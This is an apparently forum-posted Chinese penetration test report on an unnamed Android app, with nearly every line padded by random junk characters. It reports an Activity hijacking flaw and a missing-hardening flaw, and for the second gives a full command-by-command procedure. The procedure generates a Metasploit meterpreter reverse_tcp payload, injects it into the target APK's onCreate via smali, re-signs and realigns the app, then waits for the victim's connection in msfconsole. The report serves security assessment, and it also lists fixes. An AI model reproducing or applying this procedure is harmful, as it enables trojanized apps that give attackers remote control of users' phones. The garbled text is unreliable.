2 T: y5 ~4 R1 H, i @$ q8 c1 ?9 M7 a. ?+ b& x9 y* z 1-2 测试结果 * g3 v! E" b: Q6 }! `1 A' {1 M% d7 K C) Q" V* u' o3 k# e2 d- n- ?

! x: J) O7 J. y ' ~0 o" t" c$ Q

2 R) `5 C; P- l7 t5 Q- s e1 ~; m5 ~/ e   " t7 a* v- m" C' n/ L+ d3 I - L$ L" A4 b) y( @: X/ L) K

9 q9 N- m# S$ M: v4 n- }) ]# \ , u) y! O5 W- f8 @1 a# Z

+ t6 \5 p# f* ]# w( Y) D7 B& ? * c% ]+ s) I# T y 2 检测结果                    * \ n" `8 {/ i; l2 m/ t) c2 [8 } ; g! v$ @5 u1 x r/ R3 `, l: R

9 }) |% Q# N" N " K. D3 ~" Y9 Z( u6 v

+ B: ^; P a) a5 ?) J9 x6 T # B/ |) E/ s! v( L7 S 2.1 某某某 ' c8 e7 y% `9 ^$ ^ % X: g0 t) ^: M% i

% i7 {* h( F x: }2 [ 3 N9 ` ?% d) Q" ^

8 u7 F3 J7 |3 D" h, o 0 p) R R; f/ b 2.1.1检测目标 2 I6 {1 B: k# d8 ~9 B e+ Y$ [+ A, o

' V' h$ a# ]2 r% @ ; g8 H/ q; T; H3 k6 e9 x" ~/ l! f

1 \; o/ }; m$ M/ J6 Q4 @4 T* B. q $ R J+ r9 n& g6 X 目标地址: 某某某某某某APP 4 L" L7 a; X7 `% W& Q- i: M , \: }, N& Q) N

8 j& k ^3 U) R b" D+ E + A* C& |; t7 U) ]2 \+ N; Q

5 r# Y0 c) j& b9 ] % [! [; Q6 @7 d' h* [' ~7 h& J 2.1.2检测结果 * Y5 a* ]% ~& U1 R; X# M/ J2 p. F+ J; i! V+ R

( f2 ]3 ^. W* C! }3 p) t# |% w 0 l2 l9 W6 G0 y. _3 |- _+ Q1 ~

# Y( `. T+ D6 {+ K1 \; u! s6 M , C( G E5 P/ W) I# v' F 2.1.2.1 8 b4 N6 n9 l4 H# U& y7 d : O( l$ U" l" ?- L& C) j; A

% P6 S+ ]8 |5 b8 t* g+ x9 |9 J! i: m ( I& t8 g6 a* P# |" I- E& X

* H o* P. k+ J- `6 b) Q2 \. B. x9 K+ w 漏洞链接地址:某某某某某某APP 0 Q2 S0 @1 O5 b5 e6 L- Z+ [' e. {2 k0 {

2 z7 s7 n! B3 [, h # N, T, i- S* M/ A

/ T5 N! G. D$ X' p5 a3 g# N9 g ( R; ~: C, a* ?* | T   7 D: l2 J2 }+ @$ v ( d9 T+ j; i2 y8 H+ k! p) w/ q7 t

0 }) w9 |' o. ^2 a) y+ ~5 p! P+ p7 g* [' Q; y0 J

0 v* Y0 G# i% T1 v8 } 9 ]' w& @8 M! q7 ?- R8 a, o/ x 漏洞分析及取证: 9 }$ w& Q* _, X* y # H" E; l4 q$ x2 M: t

' y/ O4 i5 o4 }1 f5 Q 3 y3 r, [6 {+ g' x

" f) z0 I( f9 q: i( j' o2 s6 Y + w- A8 ~( x u- T                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: , y8 z! u* t7 K' \& i/ [, e' x7 s3 F2 C1 v$ d& V3 G% M

: y: F6 p1 Q) Y1 m4 e% y# k) q2 _ 6 }- r5 D% B* B9 |3 T

0 a) P, W+ \; P `+ y2 U! m1 r! ]3 j! \      2 m H) l/ N. _9 C a {/ ^+ \3 U1 m" u7 D1 H" B, M8 h

9 S* ^6 `) S6 f1 t; J6 W! N: |# o1 g% H6 Y1 w

9 N9 o0 }# |7 b1 i* V1 m1 |" @! n( E) t- T M                       + U6 `. e" Q0 w! n. L ' h; ~. F' D) W# C( k& L5 Y Y& |

! E: i7 h# h! i2 o * r, z! b6 S6 u3 I2 x

1 @' O9 L8 }+ |3 e ( O# d Q8 Z# [1 g$ L; v- D ) k0 M8 a* Q2 I1 o 1 A1 | T2 h7 s4 W7 {6 C

: Z1 x# `* d7 M5 h9 H6 R% {8 } - _# J+ \$ G5 o6 u" H# N# i

0 ~4 S3 b8 d6 ^1 x6 f3 F4 Z. s+ X' g8 \2 m0 {- p% ` 9 s3 R% m& E, A) j7 N1 A' J6 Z ! e- u7 W$ [6 F' [, W" y; \* L

! u- N! H- N; p1 x5 ~ " l. [; T, y* S3 U& D9 L* b

, q* a# U( ~' C0 X; W/ c 8 d5 U% `* t% L/ e7 i( T& U! Z ! j9 s4 _0 z2 h 2 L$ ^/ Z' O! C3 }, u% }/ `; c

) } E! J( u1 L0 s + Y9 L6 f8 h$ R2 T5 o; o7 P$ c

: t8 j) L+ @/ t; I - W( e8 m- Q: |3 k 漏洞危害:高 : j$ f. Y1 Q" t" v1 G $ g2 l( L( @) k

& Z" Q4 Q+ h2 P. _ p+ u \; j, r% ~
3 I7 W1 f; [. G% T( p- n9 M2 U8 S) Y5 {/ G$ \2 r O( b# y. [ ~8 @7 s( c4 ^, d* q- s9 V$ h; h2 _) g& C9 c) y4 R1 k" |9 K( l$ i! p' K+ |, h" m+ H* J# V8 w# G+ g" n& W: F, H6 f6 ]9 N6 R0 e- H- U$ Y, O7 e9 f8 j8 _+ T+ n- q! X8 H" n Q' |! l8 I3 E" ^4 V9 ]1 o- z i4 W0 A+ z# c( U! b+ q3 p; ^' i& j8 A+ w6 }8 w Z1 T4 _* H8 W5 V/ L" j) \4 K5 @( ?( x, Y3 |* ?( Z- s3 |( h4 h* Z; P7 b+ i4 t" |+ z) ~' `' D! h+ A) z! W V' R7 ?9 Q6 M+ a8 A; `+ I$ r6 D1 A( [ p- _1 i& g, N* g9 _, B# Q8 q( V6 }7 a/ l e: Y/ e1 d. x/ n4 g- V; q$ V9 J3 s: k/ d$ ?: z+ r' J, \& I1 a3 v2 f' Y2 n6 N+ H7 x, j5 O2 V) a. r! k; `: k8 f2 {* k9 b; r! B4 F1 s+ x, r
; q9 T. J; p5 f% ?( E" f5 t! x* ]7 @9 U5 `" M6 t

; ?: s/ f k1 N- d8 g) `. y7 U ; D& d, x% Z. B$ | 严重程度 6 T3 L* V( e+ U- |; R# ` 8 F" X2 ]6 Z+ @) c

: X/ d, N$ F: v * @$ k$ E! t6 p4 _
# _3 {( a; b! i$ u. Q 6 ~# c c0 c0 F& Y( G$ x7 u

; M" z3 B" d0 G9 O' Z7 S: A# m $ t5 q/ Y& M% \- w ; ~% D" b+ J4 z' U % X+ u4 v8 Y0 _( g( K1 D' u

. I' T: s% O- @" p" Z5 |- M- r1 W0 v# }6 }, g2 C& S: a. w6 f
) ~9 K% z/ l8 e7 r Q4 }. ]/ \ # J0 X& r1 G! k: o

2 t! f H# C6 i/ Y" D" H6 ]2 j f" R' t2 t9 l0 P ; k& S! [6 l' m8 N" l% Z ; Y5 G; i* | c6 l

o7 {/ _1 |/ J8 d X ! I( f$ t: v" {( H
$ u9 M# }6 T* I3 o: k2 C( U , o/ E- d4 v# w4 d8 Q: B

7 {- T) |+ Y1 r. H2 r% V2 s" p" E: h1 g7 x2 R. u " ]9 @( o8 ^3 ~- p: g1 n) t- V* ?; I( Y- U, l

( i$ A4 a: T2 |$ f# F* T0 h8 I' v/ |4 H
5 v9 m9 j6 m; \4 W 9 F# B& ~ Q% ]6 ]

: R6 a8 W: U6 a5 q( i" g 8 |: O, v( ]& c) @$ K5 N: B   ! k' Q$ r# l) X$ w) f4 K9 K' f/ z& j o) u( S& @) r8 }/ T

9 o0 `6 q% w) @! _0 A) _+ o 6 G1 p% O! @4 B# u( ?7 y
3 \+ u7 v) X$ ^8 @( R7 z" {! Z% N/ D' c# Q! A" u

# W$ v: j4 F [3 w: d5 l! ~# h3 C4 h9 l a; Y ) R1 Q8 [% g& P/ A1 C7 j# H+ _$ C % u1 r3 }& r' t$ D5 @; G- W i

- ?) L. x L. e6 n2 ~, M 4 z. E6 q: R {% [
; R! G# f4 q0 y X 6 ~- B# n+ T8 s7 |# L+ ?

3 v; w! J- L# q6 c6 Z5 p1 m9 {! g7 [9 F" ^   + v5 ?+ O* K% a; J5 }& f : N# F; n% D* U

3 Z+ `6 v/ S% D) F6 F ( v. L. d, g) A0 G0 n
A. V& l/ b- y' N0 d- M; H% w5 v) |5 x2 I6 L9 i
- \: J K4 T4 x4 t0 E , t) ^8 E3 l. ]' z9 |

3 k! e# Q9 {" k5 d. m : J+ e3 b4 ]5 V9 I* Y   : h9 L0 u; W& N. K: s1 f3 j# e " U+ b$ `1 R" r& t0 {2 G) e

# P' J5 s5 \; h* [: |) f! R+ f2 b8 ~( D0 G

4 ^% Y. F) M" o' ?- G$ ], p1 z0 d& C O8 O* |' r, v 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' H% w9 u; P% A6 F- v j " Z, t! `/ C' m8 A! W1 o

) z% x. R0 `! o5 J/ e 2 ]+ C1 q# y9 _4 E

0 v1 J' p% s0 a/ r- B9 W0 S ' Q. j: a9 \1 e7 [: X5 T           , I5 O" j! I) K {" C, P. C3 g. g1 H. L2 \* z; i

0 F) q4 P8 }$ E% K & r2 N; V8 D% r/ \. h9 d* c' M+ X

4 W: b4 T. A( |* ? * ]# k- Y, N3 L5 U) L   2 f& B7 F( E1 w6 e! s& G+ ?0 X9 v( {

: y) O- h y& Q: k: L- u# N / k v# @, @2 j* t" f0 g8 G" J

; k- }, I$ t3 x 9 T/ |9 T8 T- i4 s 2.1.2.2 ) q# P( D5 O4 F: n! A" B7 |- @4 q# p9 V: l5 l

) I$ `& ?1 n3 F% Q 4 S% w7 ~$ y* A

- i5 m' A5 w2 h 6 V+ U# `+ j4 V7 J 漏洞链接地址:某某某某某某APP " |2 x5 M& I$ _1 T/ F7 c + t ?4 z# Z2 r/ M

9 g" u; t* q# a' Z: f# f) @! Z % j: w4 J4 I' x/ D$ Z9 L

) D# p' C7 y$ K: S - W& o# ~, m m' U- x 漏洞分析及取证: h+ h2 T9 \& V4 P A" X4 F ) g* v X* m4 U" a

g Y' n f7 r. f. X0 k4 _' ^( L

6 E3 F, }3 g3 W: {, F2 R) k ' K5 u" {# A# Y6 K! ^) Y5 q K                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: % d L4 s: W! p8 g + I8 k3 t* c: Q; P/ G2 s

% g8 D9 B0 ]/ m! G! N @# n 5 U% z) b% W9 Y. S% i5 k; ?7 J

. ~0 V1 j* i( q7 g ; ]0 n1 M6 H% L Metasploit 生成木马 apk % q$ _" O# t: r! E; V. j( V0 `1 T( H, s/ [. T1 d! {

5 }0 ~* A' Y9 p( k0 ? : t7 [6 S: f5 H; w& p' F

. q' S. v R1 W! m0 _( a+ T2 T, Z2 ~8 h # v/ j& P+ B) s6 h% h7 n7 | msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / E" U. R- b" u; [/ y ; ]$ F+ M5 m. M1 H$ a

, x6 c: r$ N. o, ~' C) {" `# ~ 9 S4 j: v7 C( h/ p c! |

5 }0 c$ R9 U' e3 w; U' G ! D( [$ D$ {2 [5 Y8 i 反编译目标apk和木马apk & G: l }5 U( ~ 8 a" B; A# h: ?5 t

* R4 Q) j- G& @4 \0 q! ~4 } Y ! {4 E/ H+ \. l, t7 B

9 [4 h, s, T* F9 ?( t: A ' M, Z+ \, c6 S$ n9 B apktool d target.apk
' M% Z$ ~& F6 F 4 e" G* E/ Z3 O apktool d cockhorse.apk
. y1 W2 F3 _% B: A% g( @3 R: e # ^$ G# U) f/ K& a7 K! q0 W

$ r$ m+ O- l0 G6 @; g/ u + k. P5 U8 i) Q7 X: f0 D

2 G- z, S7 O) ]7 V8 [+ D9 s" f , O# l! `6 N9 A7 n& C) F/ Q' f/ J 木马 apk 注入目标 apk + U: x: f/ p3 D! U4 w; E8 n; f: b + l$ ?1 }* }! m: G+ [

! i, Y& W" [) m$ A* s. `/ z1 e& k5 g1 X7 g7 O/ E

& l4 C- k5 h: l; t: b . N' M1 G: C& E D& b* Y; { i2 I 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
+ ?1 G9 w1 E4 u8 l" Y 0 y+ g1 f) j. o0 l& Y, M invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
* M8 ]) \8 l! b ) y, F3 t; C$ Z7 X9 G3 Y% F9 ?

8 s ^7 t5 [/ s4 O# c2 e0 J+ N 0 \( [3 [" a0 e, O5 x

- ?; b' |$ A8 j; N " |* B$ [' \( d, n+ G0 C' v8 G* U 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 7 o6 C# U d+ l: j$ V 2 i& L" V/ `: ^6 F% Y

. q& Y9 }9 }( J- T2 d2 J ' ?" q4 _0 Z9 M( D- L9 f( z9 s$ H

- Y0 D: R! E% M0 L. M+ Y ) w6 C5 U5 R9 w# y. } 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ : {4 \, l6 d* b& y ' D3 d: N7 v. Z# Y) q

" \8 Z" W. |; c) _- S6 F 1 ?7 }# T& }: X9 B% `

% s$ b2 v7 S$ A2 T6 s 6 m8 w5 p. c+ D4 Q0 L3 ~0 c 回编译生成最终 apk 0 x! W2 E/ s0 B% p 4 F- X6 J. Y9 N3 x

3 ~3 ]0 p$ b2 q: G) _ M! i$ _* m3 n( Q5 y/ ~- w" e8 N2 m

7 M, _+ \ {( U e - Y' b' r3 R* S; _) \$ o( u4 @) w 重新打包 9 w% Y5 ^5 K/ J" ` , k6 {9 C* z' j. K+ w! |( T

4 s5 n9 |" v- b6 N3 G0 B& x& |- T $ G, P' ^5 R. i1 d$ I; S

* z7 \- _# I% J* C; _, X9 e 3 i) W/ R; [3 w7 C3 c apktool b -o repackage.apk target_app_floder 4 w q* j+ b, T! |2 K + F% [9 o! a4 V z- R

; T0 ^: i4 L6 n3 {) L) M% a3 t * E0 |& F/ g" d2 r% ?! G

( }6 I7 p4 X- N! g5 M; ^ % M" V5 \6 m. l7 E/ h' J 创建签名文件,有的话可忽略此步骤 : v1 B/ h2 O% G 5 ~* n" {7 k5 u: e* {( ?" |

( d0 b/ X4 v. E% B. [5 C 1 {8 Z$ T- N0 Z- _

' g6 I7 W, z3 H4 U/ r l* _/ K$ j ^7 a, c& q/ Q8 A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                / p" ~- ~9 L# z# g: V! A! b% G: G7 }: q }

: k# r% S5 M" u3 Y. U3 x9 T 3 A/ [0 f3 Z) f% ]. H: P: \

! w( ~ }" g& ?) V 8 |/ P( h. l! m3 e6 S1 V 签名,以下任选其一 3 B4 q$ }1 Z' H) ]- S5 w 7 d6 K2 m* s3 b/ V/ [8 z

& o% L! s: n. S! J ( `; M) F; s' D, A9 z7 K( u- F! @4 F; P

3 L$ N. \( h8 j$ y# i: y7 g; j 9 a, b/ E$ }' T0 A: B4 {5 ^( q jarsigner 方式 % J) I2 r7 J5 {0 R, @0 h2 [; v0 }+ l1 H. |* r0 G

' R; }( w2 w# @0 e/ Z! U' s2 `3 b

, s0 u0 O$ Q; @- G 8 M2 C* P% q6 r; l, K3 Z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' h/ b9 |. w. N 4 Q# l& C: Y. i& @) E4 f' ~

# l5 U0 @6 U% t6 x% ?, x4 Y2 f! @5 B! M4 ~7 Y4 }

! M* ^5 Q' n6 M! g. | , X( v8 H/ a9 H: C7 y7 w apksigner 方式 3 c- C. G9 i7 o+ z % S7 P: d6 C2 x) V' ?6 ?% l

J% J, h- Q, p; C 4 [: K* S7 v$ c3 a

5 [" @1 W) D, _+ ? ( N* o @" N9 Z7 \# T/ V( Z6 O0 R apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk Q4 k8 I, }) ]- ^: T8 N 4 u# M( @! }% O" o

& B3 y+ ]! M9 K& j/ r 9 ]3 [; Q: p$ N1 F5 G4 I

6 N2 s5 _1 a% B8 q( Y6 \9 G 8 {9 q/ Y$ o% [0 I' G& h1 b/ { 如需要禁用 v2签名 添加选项--v2-signing-enabled false 3 o2 y2 `" z6 c6 Y* O $ i U. | q- \# F, B$ c$ M

; d. q. |3 i: k D& Y9 _, e# M4 l6 }( i9 E: N

4 p- O) x6 Q7 C. G# \ 5 C2 \1 a" n$ f5 e 验证,以下任选其一 2 d3 U9 ^7 m3 o& q0 G& @. W * o5 ^2 S5 t# D3 v

1 m& f/ o' ^& Q: H # V2 \# D8 Q- ?& x0 u

& s: F, F5 V) v' |; w* @" X- a# @9 w6 ? jarsigner方式 & N* u4 i8 |/ r% }% K* w) w- T m * l) P6 [/ v1 h" d

5 E. ?( G* O$ N" d1 } 2 L/ O. R9 ^( N1 N3 Y

; p' u4 `) Z* ?$ x& E4 u + u' ]- R2 K# x jarsigner -verify repackaged.apk / |, N& \' H- ?$ D. @ ( v0 ^; k5 E: f

1 l# O( g# I9 c- @/ ?& p/ |; o4 N* R' R% }8 [. G

/ z3 v; z. B( x2 {7 ?: `4 \6 o/ S- X% I) g8 K! f; \# ^/ w apksigner 方式 ) _) v( q) l1 S0 N: O) [# s% o% V. f* B; Y

: t' g3 W$ ~( e3 C7 G: G7 b, `9 J 9 n; K' l" _$ B8 E1 [4 e' _* ~* ~

" U0 F( L9 W5 Q( J1 C$ w$ j% y( w 7 }: Z! S0 F- p/ |) |' L apksigner verify -v --print-certs repackaged.apk # x$ I$ y+ J) }: T+ @2 u' u5 I ( x' U8 f) b" H% U3 e

0 ]6 K* c2 ^ e) P . S) l- E X: \; T1 \

$ Y5 D' X4 |7 A, y0 R- v( F" J3 q$ e . H5 y8 ]0 D* }( k keytool方式 $ Q7 @7 T$ ]& ^+ ]4 O; l 2 Q8 D0 M `3 E* u7 h' r

/ L3 `6 o3 U, E3 w4 [. q9 o+ @+ y; S7 {+ c# k. J I" j

9 u( q. S0 D+ A; J$ n3 V2 o% O0 Z, w9 F* u1 V keytool -printcert -jarfile repackaged.apk ; `% F: _* V" V* w ) M$ }2 _ o3 L/ m5 w% B1 r

$ N$ t6 \$ h' Y6 F6 v1 g* \ ' R9 z2 W0 d4 J+ r" C0 j

' A( n8 g6 j9 @, s* `% F7 A Z+ h8 B8 W! u/ B# u- i* z 对齐 " g" U$ d1 Z/ l ( S2 O0 y' U' `& ^

7 z% { f2 M7 | " A A& x, B# l+ n

& b& U0 |0 f1 x" \* C 0 m# x4 Z5 _) F" w 字节对齐优化 ( D; O" n: z, p9 z) b1 z0 O6 m3 a$ H9 F' m

0 K/ y X; {0 w$ _ / ]; C2 {( A& M( v7 \8 s1 x

, ?8 E3 x' Z; i 9 L5 U) P' c, j4 f4 r4 o" [. [1 U zipalign -v 4 repackaged.apk final.apk , L2 B. Y' z" {( ]0 T2 J& O3 g 5 ?; B: i4 D2 A4 x

, W: z$ C" p8 x( R" e$ `: ^ ! f. H7 G, t3 f9 a% O! p( y6 j$ i

! x! K* O1 s: Z 0 e0 {) X! U3 X) ^ 检查是否对齐 / i! a/ ^2 h6 @- M5 N+ x 7 e& `; f8 |8 g

7 ~4 _1 M0 X/ [. a' B2 r S( y& U; I3 d9 Q# P" s

0 k) e% e; S; X# y7 e% J1 S. |3 T/ j& J zipalign -c -v 4 final.apk 7 `, b7 E7 g" r/ r# ^. \- a0 } 8 q9 |9 H4 {" m* ?3 l% P; N

6 e* h! J5 r$ X/ W9 H 6 _: C5 d) N; M! J4 r$ T1 |

3 m4 E: Z+ {* R; l9 U7 ? ( H h. f R" w" Q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 l* r9 ^& u7 D/ A8 D " ~) e0 m; v1 Z! s) Q" V3 B

% N \- |( |- @# L , Y( A1 z2 w( g) i

8 Y: ^# t) G# {3 }, g9 c% G. g8 y( w 启动Metasploit控制台,配置参数等待上线 # F3 r) ~# g1 h9 Z3 s * T" Z$ M! n, _( W0 w7 v- E

& g q# p1 I0 P 3 d2 b8 Z' q$ W: D F

5 {9 f; J% O6 @+ N- M- `: L; y3 D& P8 P# R4 [6 p# V 在终端依次输入如下命令 ) l* Y, q! ]9 }$ G) T+ h' h$ x% _ ) ]0 Y+ t+ T/ Y$ H

, u* M C* R' ` 8 o6 q1 F* T1 A) Y0 ^, P6 ?2 ~

# A4 D6 T* H2 W3 w9 n 9 {' u! w! ^' I: S0 p4 k& W5 a msfconsole # o& L# X4 v1 e9 [1 a) J7 D! ]" b # ^ e4 r% I4 X7 ~% S6 s

1 P* A! q& o" `' E7 x3 J. i! A# T

- ~7 D, p5 k! _ 5 e* }, p+ a$ q# `3 n& n use exploit/multi/handler $ O8 ~1 j r8 ? $ z. I! k3 a, C! o# F

6 x0 D5 a8 j7 A, J 4 a) g: x" k& Y0 W

+ G* @6 e0 Z. Y+ b # H, h( t8 M% G0 y" F* U set PAYLOAD android/meterpreter/reverse_tcp " Z& ^8 P* f+ L+ z* s( s3 i2 P, u $ |0 O, R, D& a: A7 B {7 Z! e

3 V- s% v& D/ [5 B1 F. R # h$ g( f. `+ a% s2 l0 w2 l, [) A6 q: A

+ K1 H2 j- w- P* u; Q ' {- I5 e: ?1 b4 p; s) [! c set LHOST 192.xxx.xx.xx 1 h4 E, H: x7 \4 z) O) v $ f' B: H7 X- b4 Z

5 L. U. T: X* X ~3 y * \, ^. {0 A: A' S: V& S, v

. r# @8 `+ o( D7 e ! \# W) a* w: [9 f set LPORT 4444 5 ^- i; o. J5 s7 k. v / t6 X# w/ E# |. v7 L/ s

/ x0 B8 {4 d' n6 } $ b* q- v4 g3 z6 `! T* Q

E7 P0 h3 u) z- W3 O5 M+ ?0 } 7 R8 f+ S4 k; Q O exploit D* w$ I7 G. \; h9 @+ D( D. [ + N1 Y; N& D5 f9 i% N: p

+ P4 o+ o, N/ ?1 B5 ` * G& Q" p8 _( o% c) o) t

1 W5 J; J4 Y$ }! \. d 8 u3 C3 S: \! V- c& R: Z 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               - q2 b4 {. B" Y$ F; O# S2 e+ x! G$ M8 G1 U0 v# \4 E5 }2 B. W

) \8 Z) p7 i, P6 ] 9 I j p$ T- \, L y" j

- l" n6 E* t9 Q; W1 R2 t/ V! |1 ~1 }* z, g0 i: p3 y+ j& ]/ Z 漏洞危害:中 # j/ ~' W7 i) b9 }" S3 U : T5 Q2 ]* ]5 Y: ^7 i' E

6 X$ }! Q7 a' w- Z* }# m% O( z6 k2 n7 P* D* I/ {: { ^
! ?' t7 F+ T) _6 |4 d( W$ e( s3 I ' b+ K' c/ k' ^ , \( u# @6 z/ }% E# ?" Y , e0 w: g* N6 t& Z( x3 B# s " c! O2 U2 T0 q4 Z& n4 Z8 K! C- ~% v! T Z& F |) }4 y: F7 N0 ]+ V; G/ X/ L3 ~/ x0 k, K! X8 E8 `4 F7 N6 [- N, ?7 \* u8 F6 e5 ~# L J9 e' f# Z; J* K: }4 u- \! n2 u* I2 v, v( r* f) M% w& U: g1 y% G* A2 b1 @4 C& p: ?- G. G" n8 h3 z" T! X/ f2 N4 _! t, r) s0 u- L8 ?0 ]8 K0 H3 P4 }- z& v/ E+ f5 R. |/ E1 x+ `- r( ?8 K O+ k$ [0 S" E& G3 j r, M, h$ v6 F: @- [ ^% l3 ~$ L! K" R' o; t9 i, h" r* R$ `6 r/ b0 C; `) K/ C* [# z' W6 |4 e* j) c1 L5 C* u ?# e/ Y/ ` k; E5 v! h1 |/ s: t( F: B% K7 b% y3 ]: c/ B9 n- ?' L" K9 ]0 w+ a5 H
+ ~7 M2 ^+ x3 B, j0 C2 s: D4 d

2 @3 f6 R$ v* M . q, d$ P1 ^. m" C2 I+ x) F7 O 严重程度 * a7 e& k( T9 F% t) v+ \- o . H* R$ Z; c8 {

?) O( e: r; ?6 s0 f4 |% D: P: A
) L! k; \; R. |/ Y8 e4 n5 _; s c0 Y! M' r( {

! Z. M5 \, d4 k7 q; I2 |5 a& \ 9 j# p. S8 I, f& f Q - s; i2 V4 p0 a( N" @5 {8 I; b0 M& w% \' C8 h8 V3 g

- O3 B8 J: b1 i9 p2 H; b+ _ 1 r4 j9 N+ O5 s, C
! b1 F2 x. ] d# K; T & b$ a' f" {: D- Z

U$ |# |- a# s2 l3 E 3 \. I# F' F* c& d $ H& T$ j; B2 Z: x( _# h1 Y% o' A ( i8 Z2 t0 w6 w3 x/ L& R9 G

/ L; O% s8 O2 g* v9 N& H3 `( I; ` & |: a @( C9 D# M3 k* N. [9 A
+ s4 ]1 T( p# a0 _ 5 v) F4 S- h. H, O/ q

P' O% N4 x6 N; \5 ~& Y & n) n/ W9 P5 I 6 e2 ^+ I" d) |2 P x, K' \! Q v* M

4 A0 O. ]: {. {* b* h2 ] ( U) Q8 ^& \8 d
, t0 y4 U2 ?. g. h. q7 x 0 Q; L: n7 }' _ - |7 N! ~ g6 V& K. A+ N! |# x, i' p e& X$ u# E- Q

# m; H0 q% b6 k- F" T/ a 3 Y2 L2 ^2 u. G3 h& {5 l   : t \% z6 X0 c) [5 E/ y7 m& C1 k: _2 N i2 @

! W- g8 Y4 g) K" d5 O0 b& ^( R$ s- l7 Z 2 g: n% o0 O" T. Z8 ~4 C
0 N- h0 h3 D4 v + ^% e2 x8 m- H- r; \, S/ r

( H; A1 X) U; {0 p* J 4 \, z* ?" K4 h- h1 n4 S ( u9 \5 F/ X# d |" O2 @0 ]( Q / c0 Z& n( P9 c

" [4 d3 ]# Z: q% r 0 a5 Z, b5 h* Q6 r
; ^0 i! I6 @" `' n! l. G3 {; n) W) P% t, f8 J, O# U& X 7 E! r7 U n& Q2 _2 ^/ m% ?- A* V: g 8 a6 h" G' P% g$ m

+ T, A7 J6 Y- L* V2 F7 [! F6 ?* P8 N/ Q 0 y3 g3 I* V# {7 \' b1 v# O ?* A   ) i& X1 v# e: `; j8 Y4 U2 X 3 T1 J; d" |. b1 M8 V

* K4 v+ V2 Q0 ?0 Y& ?: S0 X H9 I2 g2 V" r$ [: w( \6 W4 u( H' q
6 l6 H( K1 g# } Y % Z G. y4 U+ N) W. f4 @+ F
, P# a6 f: f t, }9 \3 S+ V/ u0 \% Z Z

- v% K* l( F: F5 R: c% U% H: f+ g! V& s# t% g4 r4 n   ! s8 j* {% H) b- j8 L' l# a% o) T8 L: n: O. X6 E

/ i% M' {: X+ l. E3 B. _- u - O, k, V2 _$ d# z. L; P! Q0 z. {

. ^$ n# N1 T! K/ k! N 4 S( N4 z6 z1 ^1 Z 修复方法: / D) m S0 j0 @ % w y1 a. J& O: |9 _

N' T; k7 f; G, i1 A- p( H6 a' W& n ^8 t. N6 M, c

$ f! l$ u8 U1 ? u# Y & ?0 g# q% k) H" t. Y+ L               1. APP 启动时应做签名校验防止二次打包。
3 L- h7 T! {4 d* A ) G& A* |! a) k1 A) s 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 # W4 |. B2 L" ]8 W' O; }9 U8 r" p! {' _( z3 B

/ I8 e- `: V% ~. v% s . a, q6 `- I# {( H - M3 T: }2 T+ W - E+ ?4 _6 u! D, ? ~) l

* i" ]- [% `( l : z- P5 q9 S7 S0 J& q& z   ( r3 M3 p8 G" t% W+ z9 D ) I7 [+ ^& E; `( h' l3 z* n$ k J( E9 i

6 S J# o2 O7 W, V: A9 q) @ 7 _2 R3 }% k* q' S! `2 s9 s7 w 0 G# S3 C1 {$ Q, I7 s) N ( Z M2 j! ~+ @& @& y

; l9 E: {0 P) W# w! `3 M 2 j0 d5 |, d% ~8 s
0 `3 d+ Q4 p, p: u0 m' Q) I 5 A7 K+ X( n. Q9 v' a" ~2 x

% y) `3 ^+ I1 L8 R& K ( Z; @- Q; L b* [- b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表